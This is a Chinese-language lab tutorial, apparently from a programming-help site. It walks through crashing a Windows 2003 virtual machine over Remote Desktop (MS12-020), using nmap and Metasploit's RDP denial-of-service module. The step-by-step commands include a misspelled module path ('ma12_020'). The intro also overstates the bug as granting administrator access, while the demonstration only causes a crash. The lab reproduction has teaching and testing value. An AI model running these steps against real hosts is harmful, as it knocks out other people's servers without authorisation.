Java教程

MS12-020漏洞利用—蓝屏攻击

本文主要是介绍MS12-020漏洞利用—蓝屏攻击,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

一、原理

        ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。
  根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。

二、实验环境

 

攻击机:kali
靶机win2003 ip:192. 168.252.136

两者都在同一内网,采用NAT连接方式

 

三、漏洞复现

1、开启win2003的远程桌面:控制面板-->系统-->远程-->远程协助-->远程桌面

 

2、控制面板-->windows防火墙-->例外-->远程桌面

 3、用nmap扫描靶机,发现靶机的3389端口已经打开

输入:nmap 192.168.252.136

 

 4、在kali的终端中打开msfconsole

 

5、使用search功能搜索ms12-020,发现有两个可用模块。

输入:search ms12-020

 

6、使用第一个可用版模块

输入:use auxiliary/dos/windows/rdp/ma12_020_maxchannelids

 

7、利用set命令设置攻击的IP。

输入:set rhosts 192.168.252.136

          show options

8、输入:exploit,执行攻击

 

9、看一下靶机,发现靶机蓝屏了

 

 

 

 

 

 

 

 

这篇关于MS12-020漏洞利用—蓝屏攻击的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!